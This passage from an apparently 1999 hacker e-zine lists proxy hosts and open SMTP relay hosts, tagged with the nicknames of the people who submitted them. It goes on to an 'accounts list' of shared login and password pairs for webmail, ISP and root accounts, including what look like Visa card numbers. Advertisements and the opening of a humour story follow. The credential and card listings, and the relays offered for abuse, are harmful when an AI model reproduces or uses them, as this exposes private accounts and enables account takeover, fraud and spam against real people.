by initd_] 212.242.103.152 [latency: 11/04/99 16:39:48 EST by initd_] edsl78.mpls.uswest.net [latency: 11/04/99 16:39:04 EST by initd_] 212.242.102.167 [latency: 11/04/99 16:38:41 EST by initd_] 206.172.231.24 [latency: 11/04/99 16:38:14 EST by initd_] note.ark.ne.jp [latency: 11/04/99 16:36:54 EST by initd_] Nine-Inch-Nails.Com [latency: 11/04/99 16:11:18 EST by Kpa[4]yN] cyberspace.org [latency: 11/04/99 09:55:41 EST] 202.54.47.67 [latency: 11/04/99 04:49:04 EST by initd_] 202.54.47.41 [latency: 11/04/99 04:48:34 EST by initd_] 202.54.33.217 [latency: 11/04/99 04:28:16 EST by initd_] isdn2.pppmad.vsnl.net.in [latency: 11/04/99 04:19:02 EST by initd_] isdn3.pppmad.vsnl.net.in [latency: 11/04/99 04:18:43 EST by initd_] 202.54.4.73 [latency: 11/04/99 04:18:19 EST by initd_] 202.54.4.65 [latency: 11/04/99 04:18:02 EST by initd_] 202.54.7.165 [latency: 11/04/99 04:17:22 EST by initd_] ns.azel.co.jp [latency: 11/03/99 20:15:38 EST by sandoc] ccps.calhoun.k12.sc.us [latency: 11/03/99 20:11:06 EST by sandoc] server.scheiber.sulinet.hu [latency: 11/03/99 20:10:18 EST by sandoc] OfficeCOM-EUnet.AT.EU.net [latency: 11/03/99 20:07:21 EST by sandoc] 142.51.235.2 [latency: 11/03/99 20:03:21 EST by sandoc] ts1-10.bbs-la.com [latency: 11/03/99 20:01:48 EST by sandoc] proxy.utvlive.com [latency: 11/03/99 19:51:24 EST by sandoc] 169.207.63.69 [latency: 11/03/99 19:46:40 EST by sandoc] node100f8.a2000.nl [latency: 11/03/99 19:43:54 EST by sandoc] harken2.static.execpc.com [latency: 11/03/99 19:42:13 EST by sandoc] c30-169.the-bridge.net [latency: 11/03/99 19:40:39 EST by sandoc] edtn003331.hs.telusplanet.net [latency: 11/03/99 19:32:27 EST by sandoc] mail.dspcus.com [latency: 11/03/99 19:30:26 EST by sandoc] 212.151.186.248 [latency: 11/03/99 14:34:36 EST by Quake] ip95-105.asiaonline.net [latency: 11/03/99 04:29:40 EST by RSnake] ppp156-dps.indosat.net.id [latency: 11/03/99 04:23:35 EST by RSnake] 212.156.139.154 [latency: 11/03/99 04:23:15 EST by RSnake] ip29-170.cbn.net.id [latency: 11/03/99 04:18:43 EST by RSnake] hs0680.singnet.com.sg [latency: 11/03/99 04:16:44 EST by RSnake] expert.cc.purdue.edu [latency: 11/03/99 04:12:46 EST by RSnake] ftp.parsonrealestate.com [latency: 11/03/99 04:11:23 EST by RSnake] stevek.ne.mediaone.net [latency: 11/03/99 04:10:39 EST by RSnake] mail.coolmore.com.au [latency: 11/03/99 04:10:01 EST by RSnake] wiagate.igr.nl [latency: 11/03/99 04:09:27 EST by RSnake] node10d01.a2000.nl [latency: 11/03/99 04:08:51 EST by RSnake] fajalobi.ricardis.tudelft.nl [latency: 11/03/99 04:07:37 EST by RSnake] ursus.bio.vu.nl [latency: 11/03/99 04:06:24 EST by RSnake] 161.184.149.29 [latency: 11/03/99 03:50:07 EST by RSnake] 210.196.160.99 [latency: 11/03/99 03:49:45 EST by RSnake] 200.26.103.34 [latency: 11/03/99 03:49:23 EST by RSnake] 210.15.231.57 [latency: 11/03/99 03:48:37 EST by RSnake] 202.21.8.31 [latency: 11/03/99 03:48:14 EST by RSnake] 161.184.146.34 [latency: 11/03/99 03:47:16 EST by RSnake] hsprna1-90.sk.sympatico.ca [latency: 11/02/99 22:06:32 EST by temugin] 216.72.47.70 [latency: 11/02/99 14:28:26 EST by tmz] a00213.sjrp.mandic.com.br [latency: 11/02/99 14:09:59 EST by ursuletz] 205.188.209.44 [latency: 11/02/99 10:20:31 EST by paula] li-9-25.cytanet.com.cy [latency: 11/02/99 06:11:46 EST by ursuletz] host13.image-entertainment.com [latency: 11/02/99 05:47:25 EST by ursuletz] pm3-0-6.hm.ayrix.net [latency: 11/02/99 05:45:27 EST by ursuletz] mail.trutnov.cz [latency: 11/02/99 05:43:29 EST by ursuletz] server.goway.com [latency: 11/02/99 05:31:19 EST by ursuletz] Telezimex.ro [latency: 11/02/99 05:29:24 EST by ursuletz] interate.com.pe [latency: 11/02/99 05:28:21 EST by ursuletz] sai0103.erols.com [latency: 11/02/99 05:23:50 EST by alex] cx796116-a.pv1.ca.home.com [latency: 11/01/99 22:47:20 EST by ASSha] 24.5.158.92 [latency: 11/01/99 22:46:43 EST by ASSha] 202.54.6.1 [latency: 11/01/99 02:19:03 EST by test] nilko.com [latency: 10/31/99 19:37:28 EST by SiRiUs] battle.net [latency: 10/31/99 17:48:29 EST] i400.zbrojovka.com [latency: 10/31/99 16:29:17 EST] [ SMTP Relay hosts ] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ mailhub.iastate.edu [latency: 11/15/99 23:15:00 EST by sara] mailserver.collegeclub.com [latency: 11/15/99 19:39:13 EST by digicrash] smtp2.serverdienst.de [latency: 11/15/99 10:21:06 EST by Aldi_Provider_Killer] mailx.reseller.de [latency: 11/15/99 10:20:34 EST by Aldi_Provider_Killer] mail.telepac.pt [latency: 11/14/99 08:39:59 EST by Volture] smtp.prodigy.net [latency: 11/13/99 22:27:18 EST by Trac3] email.dnet.net [latency: 11/12/99 17:59:12 EST by wayne hiatt] smtp.rad.net.id [latency: 11/09/99 16:31:49 EST by adsf] nuhsd.k12.ca.us [latency: 11/09/99 16:04:57 EST by The Guy] mail.formsuk.com [latency: 11/08/99 00:11:21 EST by weirdo] smtp.freeaccount.com [latency: 11/07/99 19:33:07 EST by Spammmer] smtp.earthlink.net [latency: 11/07/99 19:32:01 EST by The Guy] mail.politie.nl [latency: 11/06/99 15:15:15 EST by its a police server!] smtp.zzn.com [latency: 11/06/99 13:55:46 EST] smtp.netvision.net.il [latency: 11/06/99 13:54:24 EST] XXXMOVIES.NET [latency: 11/06/99 08:33:32 EST by MADARCHOOD] natinst.com [latency: 11/06/99 08:31:19 EST by MADARCHOOD] rmx.mail.com [latency: 11/06/99 08:30:23 EST by RANDI] 24.28.66.142 [latency: 11/06/99 04:16:18 EST by ROMRacer] tm.net. [latency: 11/06/99 00:41:13 EST] Cnet.com [latency: 11/05/99 21:14:32 EST] mail.takas.lt [latency: 11/05/99 19:57:26 EST by lansbergis] 202.186.17.4 [latency: 11/04/99 10:58:17 EST by TeNnO] mail.ecalton.com [latency: 11/03/99 02:49:31 EST by test] 12.18.76.6 [latency: 11/02/99 13:38:06 EST] 24.5.158.92 [latency: 11/01/99 22:49:50 EST by ASSha] cx796116-a.pv1.ca.home.com [latency: 11/01/99 22:49:08 EST by ASSha] smtp.ix.netcom.com [latency: 10/31/99 23:35:59 EST by Cyborg Clown] lcs.mit.edu [latency: 10/31/99 21:21:45 EST by theta] 194.126.104.175 [latency: 10/31/99 18:13:24 EST] mail.netzero.net [latency: 10/31/99 13:30:16 EST by Kode Cypher] mail.caen.it [latency: 10/31/99 04:47:03 EST by -KruGer-] mail.dbu.edu [latency: 10/29/99 18:58:02 EDT by Jointt] mail.aug.edu [latency: 10/29/99 18:56:46 EDT by Jointt] mail.gmu.edu [latency: 10/29/99 18:52:11 EDT by Jointt] freemail.org [latency: 10/28/99 09:17:58 EDT by tådd patherzon] freemail.org. [latency: 10/28/99 09:17:55 EDT by tådd patherzon] zoom.com [latency: 10/26/99 22:50:34 EDT by eeerm] python.ussco.com [latency: 10/26/99 15:04:07 EDT] mail.bih.net.ba [latency: 10/25/99 13:19:34 EDT by Gorazdak] mail.fun4u.net [latency: 10/24/99 22:44:11 EDT by fun4u] zombie.com [latency: 10/23/99 23:17:32 EDT by cowhead2000] mail.cowheadcomputers.com [latency: 10/23/99 22:49:31 EDT by cowhead2000] smmusd.org [latency: 10/20/99 21:59:53 EDT by Poet] mail.itis.com [latency: 10/19/99 15:13:42 EDT by fuck you Cyberarmy y] relay-mail.clark.net [latency: 10/19/99 14:04:12 EDT by tkdgnr8] siamail.sia.it [latency: 10/18/99 15:05:46 EDT] smtp.email.msn.com [latency: 10/17/99 23:38:30 EDT] 147.205.109.253 [latency: 10/17/99 19:42:35 EDT] cache-rg01.proxy.aol.com [latency: 10/16/99 12:46:51 EDT] sdf.lonestar.org [latency: 10/15/99 22:36:27 EDT by Psycho Bitch] mx.01019freenet.de [latency: 10/15/99 19:50:15 EDT by jasmin] mail.ecalton.com [latency: 10/13/99 03:17:54 EDT] mail.daisytek.com [latency: 10/12/99 21:01:58 EDT by AntiEdie] mail.usa.de [latency: 10/12/99 10:53:48 EDT by Sub.Xer0] Lionhead.co.uk [latency: 10/12/99 04:43:14 EDT by DrSoloMan] gatekeeper.collins.rockwell.com [latency: 10/12/99 00:37:13 EDT by Sauron] smtp.bip.net [latency: 10/09/99 12:18:32 PDT] smtp.smtp.net [latency: 10/09/99 10:48:24 PDT by GkA] smtp.tm.net.my [latency: 10/09/99 07:57:17 PDT by EeKkS] az-fw.azerty.com [latency: 10/08/99 17:46:22 PDT by Edie] 143.92.24.65 [latency: 10/06/99 23:37:58 PDT by brahma] 194.96.164.150 [latency: 10/06/99 16:06:39 PDT by Agent Hamel] smtp.kabelfoon.nl [latency: 10/06/99 12:00:31 PDT] sanborn.k12.nh.us [latency: 10/06/99 11:31:44 PDT by om3g4 sucks] mail.ttlc.net [latency: 10/06/99 11:31:02 PDT by om3g4 sucks] are p3E9D4CB5.dip0.t-ipconnect.d [latency: 10/04/99 22:48:41 PDT by nethe@d] mail.bright.net [latency: 10/04/99 18:43:51 PDT by tommy] mail.netzero.net [latency: 10/03/99 19:43:07 PDT by iceburn(pratik)] smtp.home.se [latency: 10/03/99 13:26:18 PDT by aDreNaLinZ] 207.155.122.20 [latency: 10/03/99 01:51:39 PDT by T|rant] 216.129.5.92 [latency: 10/02/99 12:30:49 PDT by Neri] turing.unicamp.br [latency: 09/30/99 17:22:35 PDT by - Dark Priest -] smtp.cybercable.fr [latency: 09/29/99 03:58:31 PDT by is that me??] ub.edu.ar [latency: 09/28/99 08:42:29 PDT by Avelino Porto] 200.39.147.18 [latency: 09/27/99 19:39:42 PDT] mail.eexi.gr [latency: 09/27/99 11:13:56 PDT] freemail.org.mk [latency: 09/25/99 17:17:28 PDT] 209.183.86.96 [latency: 09/25/99 11:14:46 PDT by vegan_100%] mail.versaversa.be [latency: 09/25/99 05:43:41 PDT by tt] surabaya.wasantara.net.id [latency: 09/25/99 03:18:03 PDT] 204.143.102.68 [latency: 09/24/99 05:28:49 PDT by hiran] 161.200.192.1 [latency: 09/22/99 09:52:46 PDT] smtp.netpathway.com [latency: 09/21/99 18:32:54 PDT by SycoKiddie] library.shastacollege.edu [latency: 09/20/99 09:14:31 PDT by Capt. Krunch] sandwich.net [latency: 09/18/99 04:28:34 PDT by BroS^ Inc ] zoom.com [latency: 09/17/99 18:45:22 PDT by Pistor Joubert] 205.252.249.4 [latency: 09/16/99 01:52:38 PDT by The Mad1 (or Mad1)] mail.worldinter.net [latency: 09/14/99 19:19:48 PDT by Animosity] elitist.org [latency: 09/12/99 19:37:15 PDT by daniel shatter] mail.dailypost.com [latency: 09/11/99 06:39:22 PDT by KaDoS HaRdCoRe 1488] 140.254.114.178 [latency: 09/10/99 17:19:40 PDT] smtp.netzero.net [latency: 09/10/99 08:36:04 PDT] smtp.mail.com [latency: 09/10/99 01:52:46 PDT by neron] ibm.net [latency: 09/09/99 20:29:44 PDT by aNaS] config2.il.us.ibm.net [latency: 09/09/99 20:29:22 PDT by aNaS] patent.womplex.ibm.com [latency: 09/09/99 20:28:13 PDT by aNaS] partners.boulder.ibm.com [latency: 09/09/99 20:27:37 PDT by aNas] ncc.hursley.ibm.com [latency: 09/09/99 20:27:03 PDT by aNas] mail.ichadmin.uk.ibm.com [latency: 09/09/99 20:26:42 PDT by aNas] config1.il.us.ibm.net [latency: 09/09/99 20:26:20 PDT by aNaS] bugtiz.com [latency: 09/09/99 20:24:40 PDT by aNaS] anas17.net [latency: 09/09/99 20:23:59 PDT by aNaS] mail.net-magic.net [latency: 09/09/99 17:21:08 PDT by this'n really works!] smtp.apolloweb.net [latency: 09/08/99 12:52:07 PDT by aNaS] anas17.com [latency: 09/08/99 12:50:47 PDT by aNAS] smtp-gw01.ny.us.ibm.net [latency: 09/08/99 12:50:02 PDT by aNaS] ultra.unt.se [latency: 09/06/99 16:53:47 PDT by Razzon] 130.91.28.211 [latency: 09/06/99 16:52:49 PDT by Razzon] 203.102.153.226 [latency: 09/06/99 16:52:30 PDT by Razzon] sierrasource.com [latency: 09/06/99 14:05:42 PDT] pop.casema.net [latency: 09/05/99 14:23:16 PDT] maxking.com [latency: 09/04/99 17:06:49 PDT by AcidFire] ns1.peoples.com.ar [latency: 09/02/99 21:13:37 PDT by Merry Michael] hell.com [latency: 09/01/99 20:55:09 PDT by InsaneOne] springfield.mec.edu [latency: 09/01/99 10:59:51 PDT] hotpop.com [latency: 08/29/99 22:26:53 PDT by Scalpel] 164.109.1.3:22 [latency: 08/28/99 14:38:59 PDT] mail.compuserve.com [latency: 08/28/99 03:08:25 PDT] smtp.i.wanna.fuck.ur.mother.com [latency: 08/27/99 01:47:47 PDT by I Wanna Fuck Your Mo] smtp.mail.com [latency: 08/27/99 01:46:54 PDT by Mail.Com User] smtp.tm.net.my [latency: 08/27/99 01:45:47 PDT by TMNet User] smtp.jaring.my [latency: 08/27/99 01:45:09 PDT by Jaring User] pop.netsoc.ucd.ie [latency: 08/26/99 09:02:54 PDT] pop.site1.csi.com [latency: 08/26/99 02:29:48 PDT by RuCKuS] mail.cut.org [latency: 08/24/99 10:03:44 PDT by neron sux dick] host.phc.igs.net [latency: 08/24/99 04:18:56 PDT] smtp.phc.igs.net [latency: 08/24/99 04:17:19 PDT] zeus.ax.com [latency: 08/23/99 21:27:05 PDT by Messiah] smtp.ifrance.com [latency: 08/23/99 10:48:42 PDT by k-tEAR] smtp.obase.com [latency: 08/21/99 18:34:14 PDT by Arthur Dent] mail.hackers.com [latency: 08/21/99 13:48:52 PDT by ^Omega] mail.porn.com [latency: 08/21/99 13:47:52 PDT by ^Omega] wsnet.ru [latency: 08/21/99 05:27:04 PDT by telotrin] ugansk.wsnet.ru [latency: 08/21/99 05:26:24 PDT by telotrin] mail.ugansk.intergrad.com [latency: 08/21/99 05:17:33 PDT by telotrin] smtp-khi2.super.net.pk [latency: 08/19/99 13:13:28 PDT by Manch] graham.nettlink.net.pk [latency: 08/19/99 13:11:09 PDT by Manch] mail.cut.org [latency: 08/19/99 11:14:08 PDT by néron] mail.cyberamy.com [latency: 08/19/99 11:06:38 PDT] mail.mendes-inc.com [latency: 08/19/99 04:40:45 PDT by RALPH] zoooom.net [latency: 08/18/99 19:34:39 PDT by kopkila] smtp.ozemail.com.au [latency: 08/16/99 07:58:10 PDT] mailgw.netvision.net.il [latency: 08/14/99 23:04:29 PDT by Anton] smtp.mail.ru [latency: 08/14/99 23:03:40 PDT by Anton] purg.com [latency: 08/13/99 17:38:57 PDT] jeg.eier.holmlia.com [latency: 08/13/99 05:24:16 PDT by Music-BoY] saintmail.net [latency: 08/12/99 07:20:17 PDT by trinity] pop.fast.co.za [latency: 08/12/99 07:19:21 PDT] smtp2.zdlists.com [latency: 08/11/99 15:47:30 PDT by Razzon] mail.eexi.gr [latency: 08/10/99 15:10:26 PDT] mail.cyberamy.com [latency: 08/08/99 20:36:08 PDT by noname] gilman.org [latency: 08/08/99 13:19:37 PDT] mail.friendsbalt.org [latency: 08/08/99 13:19:21 PDT] cache-rb03.proxy.aol.com [latency: 08/07/99 09:41:00 PDT by Buddy McKay] merlin.sicher.priv.at [latency: 08/06/99 21:29:33 PDT by DeadWrong] smtp.infovia.com.gt [latency: 08/06/99 17:22:27 PDT] zoooom.net [latency: 08/06/99 11:14:00 PDT by CrazyNiga] aol.net.pk [latency: 08/06/99 11:13:43 PDT by CrazyNigaq] 169.207.154.209 [latency: 08/05/99 22:02:06 PDT by Razzon] cpqsysv.ipu.rssi.ru [latency: 08/04/99 01:31:17 PDT] hell.org [latency: 08/03/99 21:41:46 PDT by Suid Flow] 205.188.192.57 [latency: 08/03/99 21:27:53 PDT by vegan_5] 216.192.10.4 [latency: 08/03/99 21:27:22 PDT by vegan_5] mail.net-magic.net [latency: 08/03/99 16:18:49 PDT by Micheal Layland] mail.sojourn.com [latency: 08/03/99 15:01:38 PDT by ZeScorpion] mail.q-texte.net.ma [latency: 08/03/99 13:10:51 PDT by LeSaint] mail.netvision.net.il [latency: 08/03/99 11:04:03 PDT] fasolia-louvia.com.cy [latency: 08/03/99 02:27:46 PDT by blah] mail.direct.ca [latency: 08/02/99 21:46:52 PDT] Spacewalker.wanna.join.it.com [latency: 08/01/99 15:40:28 PDT] mail.start.com.au [latency: 08/01/99 07:27:25 PDT by QuaKeee] mail.vestelnet.com [latency: 08/01/99 07:26:41 PDT by QuaKeee] 205.149.115.147 [latency: 08/01/99 04:06:16 PDT by KeKoA] bareed.ayna.com [latency: 07/30/99 07:03:24 PDT] youthnet.org [latency: 07/30/99 01:11:21 PDT by vegan_%] inext.ro [latency: 07/28/99 14:35:02 PDT by latency] iccnet.icc.net.sa [latency: 07/28/99 14:02:54 PDT by none] mail.eexi.gr [latency: 07/27/99 15:39:30 PDT] mail.dnt.ro [latency: 07/27/99 01:00:59 PDT by DitZi] mail.compuserve.com [latency: 07/26/99 13:11:15 PDT by CyberNissart] pg.net.my [latency: 07/25/99 09:23:19 PDT by [X]r3Wt] scholar.cc.emory.edu [latency: 07/24/99 14:49:04 PDT by Cougar] imail.young-world.com [latency: 07/24/99 08:34:44 PDT by The Lord] mail.cut.org [latency: 07/22/99 17:40:19 PDT by AniXter] 205.244.102.167 [latency: 07/22/99 14:47:28 PDT by Razzon] relay.cyber.net.pk [latency: 07/22/99 03:24:48 PDT by crush2] mail.lanalyst.nl [latency: 07/22/99 00:55:18 PDT by phobetor] mail.lig.bellsouth.net [latency: 07/22/99 00:48:27 PDT by Deth Penguin] batelco.com.bh [latency: 07/21/99 12:54:53 PDT by asswipe] ns1.infonet-dev.co.jp [latency: 07/20/99 18:25:11 PDT by bokuden] inext.ro [latency: 07/20/99 15:11:39 PDT by the_aDb] siamail.sia.it [latency: 07/20/99 13:07:27 PDT by The Lord] [ Accounts list (mainly bogus, some legit try em and see) ] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ nyx.net login anon9085 : boss-007 [latency: 11/17/99 02:11:41 EST by Altazefuego] www.kurtuluscephesi.com login turkiye : 123 [latency: 11/16/99 10:05:50 EST by se] www.turkcell.com login unforgiven : 123 [latency: 11/16/99 10:02:50 EST] www.super.net.pk login jbabu : give4take1 [latency: 11/15/99 21:02:42 EST by Vapour007] www.hotmail.com login Abba66 : bu187 [latency: 11/15/99 21:01:01 EST by John ] www.www.com login timmy1240 : johnny [latency: 11/15/99 17:41:44 EST by Toad] www.hotmail.com login muffin_kitty : benjamin [latency: 11/15/99 17:34:47 EST] www.hotmail.com login corrosive1 : shazia [latency: 11/15/99 00:32:21 EST] NOTHING HERE WORKS.NOW login nothing : works [latency: 11/14/99 12:09:38 EST by handicapped] hotmail.com login iluvit11 : iluvspam [latency: 11/13/99 14:24:41 EST] www.visa.com login ANYBODY.... : PLEZZZZZZ [latency: 11/13/99 03:33:04 EST by dedoor@england.com] www.super.net.pk login jbabu : give4take1 [latency: 11/12/99 13:01:45 EST] hotmail.com login mkashif72 : 12345678 [latency: 11/12/99 08:52:18 EST by kashif] www.hotmail.com login corrosive1 : shazia [latency: 11/12/99 06:56:32 EST] www.hotmail.com login Abba66 : bu187 [latency: 11/10/99 14:21:12 EST] www.aol.com login Sadow101 : Ajck214U [latency: 11/10/99 09:25:33 EST by Vapour007] www.vvideo.com login fresh : video [latency: 11/10/99 09:21:50 EST by Vapour007] www.18asiansluts.com login fast : love [latency: 11/10/99 09:21:07 EST by Vapour007] www.super.net.pk login jbabu : give4take1 [latency: 11/10/99 09:17:53 EST by Vapour007] www.digicom.com login asad : Apple2642 [latency: 11/10/99 09:16:42 EST by Vapour007] www.cyber.net.pk login taj : zxcvbnm [latency: 11/10/99 09:14:00 EST by Vapour007] www.celebritysexmatch.com login command : conquer [latency: 11/10/99 09:09:44 EST by Vapour007] www.batelnet.bs login tiny : 719 [latency: 11/09/99 18:07:26 EST] www.hotmail.com login adi_oli : iloveliviu [latency: 11/09/99 16:09:51 EST by BM-Freak] www.tripod.com login radus : sefu [latency: 11/08/99 22:04:30 EST] www.visa.com login I GOT IT : 4921010012520026 [latency: 11/08/99 14:49:00 EST by 03/2001] www.visa.com login I GOT VISA : 4192010012520026 [latency: 11/08/99 11:20:31 EST by VISA] www.mail.forum.dk login gugl1 : gugl1x [latency: 11/08/99 09:11:01 EST by whf] Nyx.net login jexploit : exp-666 [latency: 11/08/99 07:15:46 EST by ExPl0iTeD] www.visa.com login I NEED IT : PLEZZZZ [latency: 11/07/99 19:34:25 EST by Nick name] member.babylon-x.com login shahbaz : 6671569 [latency: 11/07/99 19:31:50 EST] hobbiton.org login shazbot : crazy [latency: 11/07/99 16:06:09 EST by badboy@dma.be] hotmail.com login hacknvirii : airforce [latency: 11/07/99 02:43:37 EST by FLASH FIRE] smtp tm.net login st34l3r : 29382 [latency: 11/07/99 02:19:09 EST by schrudine] member.babylon-x.com login liveandhard : daycore [latency: 11/06/99 10:52:36 EST by Bob] www.hotmail.com login fabian_de_ponte : atreides [latency: 11/05/99 11:38:35 EST by Elgevito] www.hotmail.com login andrea_b_z : atreides [latency: 11/05/99 11:38:08 EST by Elgevito] member.babylon-x.com login shahbaz : 6671569 [latency: 11/05/99 08:18:45 EST by lifetime] www.caramail.com login spootnik1 : 1234 [latency: 11/05/99 01:39:59 EST by TheMaster] intranet.reda.net login z-master : 0389775307 [latency: 11/05/99 01:39:10 EST by Caramel] www.hotmail.com login cartermikey : holocaust [latency: 11/05/99 00:01:09 EST by Holocaust] www.visa.com login I NEED IT : PLEZZZZ [latency: 11/04/99 07:14:25 EST by dedoor@england.com] www.visa.com login I.NEED.VISA : I.NEED.IT [latency: 11/04/99 06:59:01 EST by I.NEED.VISA.NUMBER] www.hotmail.com login metallicblue : 1234qwer [latency: 11/03/99 15:14:58 EST by yomismo] midland.fp.k12.wa.us login 943527 : kawaii [latency: 11/03/99 12:10:19 EST by Ken Heianna] www.homail.com login kalle : kabito [latency: 11/02/99 17:24:01 EST] www.hotmail.com login hinatahir : 12345678 [latency: 11/02/99 03:55:38 EST by NOMI] www.hotmail.com login abbas_bashir : daytec12 [latency: 11/01/99 12:25:26 EST by Guddo the great.] www.hotmail.com login metallicblue : 1234qwer [latency: 10/31/99 15:01:22 EST by §â†âÑ] www.visa.com login Charls_Filart : Exp_3\01 [latency: 10/31/99 09:49:14 EST] www.hotmail.com login simba2000 : bussemand [latency: 10/31/99 06:57:30 EST by EDITH] www.hotmail.com login laisha_99 : 666 [latency: 10/31/99 00:59:01 EDT by Brandon] www.linuxstart.com login havefunforfree : 123456789 [latency: 10/30/99 19:25:41 EDT by ViRiiTaS] www.hotmail.com login brymbar : 5555 [latency: 10/29/99 19:05:05 EDT by Joint] freejacksite.cjb.net login webmaster : fruitoftheloom [latency: 10/28/99 18:46:23 EDT by John] www.visa.com login Charles _Filart : Exp_ 3/01 [latency: 10/26/99 11:40:36 EDT] ftp.fortunecity.com login aaa : bbb [latency: 10/26/99 04:23:47 EDT by ccc] ftp.fortunecity.com login Hack26 : jsmith [latency: 10/25/99 14:23:41 EDT by cRaZy_haC WHO ELSE!!] 209.67.136.174 login root : EMAIL ME IT!!!! [latency: 10/24/99 20:06:36 EDT by tha_ratt@hotmail.com] shell.icon.co.za login compaq : scorer [latency: 10/24/99 05:57:50 EDT by system_85] xs4all.nl login jeroendr : jeroen17 [latency: 10/22/99 16:48:39 EDT by jeroen] xs4all.nl login xtc : xtc00 [latency: 10/22/99 16:48:10 EDT by xtc] www.hotmail.com login pimppollo : dresanandres [latency: 10/21/99 16:05:24 EDT by Jigga Who?] adults-online.com login billbill : billbill [latency: 10/21/99 13:45:19 EDT by not u] www.hotmail.com login giorgiobel : armani [latency: 10/21/99 13:15:09 EDT] freehome.myrice.com login kjn : heineken [latency: 10/21/99 10:56:46 EDT by su] 192.116.192.8 login elias2000 : leeee [latency: 10/20/99 20:47:53 EDT by elias] catskill.net login pennie : randy [latency: 10/20/99 14:24:10 EDT by not u] dandi.inext.ro login root : admin34 [latency: 10/20/99 03:15:51 EDT by Cristos] www.nightmail.com login jammer97 : rustyvolvo [latency: 10/18/99 23:44:07 EDT by max] cyber.net.pk login rehman : sexygirl [latency: 10/18/99 13:21:48 EDT by ivo] mail.yahoo.com login dencoln : puma [latency: 10/17/99 23:26:49 EDT by d3nGoD] netvision.net.il login root : adm353 [latency: 10/17/99 10:00:27 EDT] batelco.com.bh login user : batelco [latency: 10/16/99 16:20:51 EDT by hacker] grex.cyberspace.org login psybi : cyber69p [latency: 10/15/99 22:15:51 EDT by Psycho Bitch] www.visa.com login Charls_Filart : Exp_3\01 [latency: 10/15/99 16:00:41 EDT] www.hotmail.com login hananboro : gal92792 [latency: 10/15/99 10:10:31 EDT by peace] www.infohack.org login secreto : WARNING [latency: 10/15/99 07:10:05 EDT by hedg] usa.net login fasaraxs : 77fasaraxs77 [latency: 10/14/99 19:56:47 EDT by ad] ftp.pioneeris.net login thunderz : vinnie [latency: 10/14/99 17:49:01 EDT by CRTLBL1159] microsoft.com login skyhawk : 07011971 [latency: 10/14/99 15:38:31 EDT] www.dalnet.com login houhou : nounou [latency: 10/12/99 14:59:04 EDT by haissam] @HWA -=----------=- -=----------=- -=----------=- -=----------=- 0 0 0 o O O O 0 =----------=- -=----------=- -=----------=- -=----------=- -=----------=- =----------=- -=----------=- -=----------=- -=----------=- -=----------=- AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _ _ _ _ /\ | | | | (_) (_) / \ __| |_ _____ _ __| |_ _ ___ _ _ __ __ _ / /\ \ / _` \ \ / / _ \ '__| __| / __| | '_ \ / _` | / ____ \ (_| |\ V / __/ | | |_| \__ \ | | | | (_| | /_/ \_\__,_| \_/ \___|_| \__|_|___/_|_| |_|\__, | __/ | |___/ ***************************************************************************** * * * ATTRITION.ORG http://www.attrition.org * * ATTRITION.ORG Advisory Archive, Hacked Page Mirror * * ATTRITION.ORG DoS Database, Crypto Archive * * ATTRITION.ORG Sarcasm, Rudeness, and More. * * * ***************************************************************************** When people ask you "Who is Kevin Mitnick?" do you have an answer? www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co m www.2600.com ########################################ww.2600.com www.freeke vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick. com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free kevin.com www.k# FREE EVIN! #in.com www.kevinmitnic k.com www.2600.########################################om www.2600.com www.fre ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre http://www.2600.com/ http://www.kevinmitnick.com +-----------------------------------------------------------------------------+ | SmoG Alert .. http://smog.cjb.net/ NEWS on SCIENCE | | =================== http://smog.cjb.net/ NEWS on SECURITY | | NEWS/NEWS/NEWS/NEWS http://smog.cjb.net/ NEWS on THE NET | | http://smog.cjb.net/ NEWS on TECHNOLOGY | +-----------------------------------------------------------------------------+ * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net * * www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net * * http://www.csoft.net" One of our sponsers, visit them now www.csoft.net * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV * * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ////////////////////////////////////////////////////////////////////////////// // To place an ad in this section simply type it up and email it to // // hwa@press,usmc.net, put AD! in the subject header please. - Ed // // or cruciphux@dok.org // ////////////////////////////////////////////////////////////////////////////// @HWA HA.HA Humour and puzzles ...etc ~~~~~~~~~~~~~~~~~~~~~~~~~ Don't worry. worry a *lot* Send in submissions for this section please! ............c'mon, you KNOW you wanna...yeah you do...make it fresh and new...be famous... Hacker Horror 1: "Tell-Tale Voltage Regulator" Late one night, in the basement of his work, Harold was recompiling his kernel for the 15th time that week. "Maybe one day, I'll have a kernel that works!" thought Harold. One of Harold's problems was that he only had a 386DX25 with 4 megs of ram to work with. The accountants all got the P166's with 32 megs of ram. After the compile was completed he installed it and proceeded to reboot his system. Everything appeared to be working normally, except for one thing... "FOR CRYING OUT LOUD!!, I forgot to compile the crappy ethernet card support!!" In frustration, Harold slammed his fist down on the keyboard, then lifted the monitor and threw it across the room. As the 